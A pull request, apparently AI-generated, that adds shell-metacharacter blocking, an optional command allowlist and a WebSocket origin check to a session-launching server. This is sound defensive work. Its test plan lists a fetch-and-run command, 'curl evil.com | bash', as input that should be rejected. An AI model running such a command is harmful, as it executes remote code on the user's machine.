### PR TITLE
Add command validation and WebSocket origin check

### DIFF
--- a/src/server/config.ts
+++ b/src/server/config.ts
@@ -163,4 +163,11 @@ export const config = {
   remoteStaleMs,
   remoteSshOpts,
   remoteAllowControl,
+  // Optional command allowlist for session-create (defense-in-depth against RCE)
+  // Comma-separated binary names, e.g. "claude,codex,aider"
+  // Empty/unset = allow all commands that pass metacharacter check
+  allowedCommands: (process.env.AGENTBOARD_ALLOWED_COMMANDS || '')
+    .split(',')
+    .map((c) => c.trim())
+    .filter(Boolean),
 }

--- a/src/server/validators.ts
+++ b/src/server/validators.ts
@@ -18,3 +18,52 @@ export function isValidTmuxTarget(target: string): boolean {
   }
   return TMUX_TARGET_PATTERN.test(target)
 }
+
+// Shell metacharacters that enable injection (chaining, piping, subshells, expansion)
+const SHELL_METACHAR_PATTERN = /[;|&$`(){}<>\n\r\\]/
+
+/**
+ * Validate a command for session-create.
+ *
+ * Layer 1: Reject shell metacharacters to prevent injection.
+ * Layer 2: If allowedCommands is non-empty, only listed binaries can be
+ *          the first token (basename) of the command.
+ *
+ * Empty/undefined command returns true (SessionManager defaults to `claude`).
+ */
+export function isValidSessionCommand(
+  command: string | undefined,
+  allowedCommands?: string[]
+): { valid: boolean; reason?: string } {
+  // Empty command is fine — SessionManager defaults to `claude`
+  if (!command) {
+    return { valid: true }
+  }
+
+  if (command.length > MAX_FIELD_LENGTH) {
+    return { valid: false, reason: 'Command too long' }
+  }
+
+  // Layer 1: metacharacter blocking
+  if (SHELL_METACHAR_PATTERN.test(command)) {
+    return { valid: false, reason: 'Command contains invalid characters' }
+  }
+
+  // Layer 2: optional allowlist
+  if (allowedCommands && allowedCommands.length > 0) {
+    const firstToken = command.trim().split(/\s+/)[0]
+    if (!firstToken) {
+      return { valid: true } // whitespace-only treated as empty
+    }
+    // Extract basename (e.g. "/usr/bin/claude" -> "claude")
+    const binary = firstToken.split('/').pop() || firstToken
+    if (!allowedCommands.includes(binary)) {
+      return {
+        valid: false,
+        reason: `Command not in allowed list: ${binary}. Allowed: ${allowedCommands.join(', ')}`,
+      }
+    }
+  }
+
+  return { valid: true }
+}


### PR DESCRIPTION
## Summary

- Validate `session-create` commands — rejects shell metacharacters in command input
- Add optional `AGENTBOARD_ALLOWED_COMMANDS` env var (comma-separated binary names, e.g. `claude,codex,aider`) to restrict which programs can be launched. Empty/unset = allow all (no change for existing users)
- Check `Origin` header on WebSocket upgrade — allows same-host, localhost, and non-browser clients; rejects cross-origin

## Test plan

- [x] `bun run lint` — 0 warnings, 0 errors
- [x] `bun run typecheck` — passes
- [x] `bun run test` — 422 pass (2 pre-existing paste-image failures on master)
- [ ] Manual: `session-create` with `claude` works normally
- [ ] Manual: `session-create` with `curl evil.com | bash` rejected
- [ ] Manual: WebSocket from same origin connects fine
- [ ] Manual: WebSocket with `Origin: https://evil.com` gets 403

🤖 Generated with [Claude Code](https://claude.com/claude-code)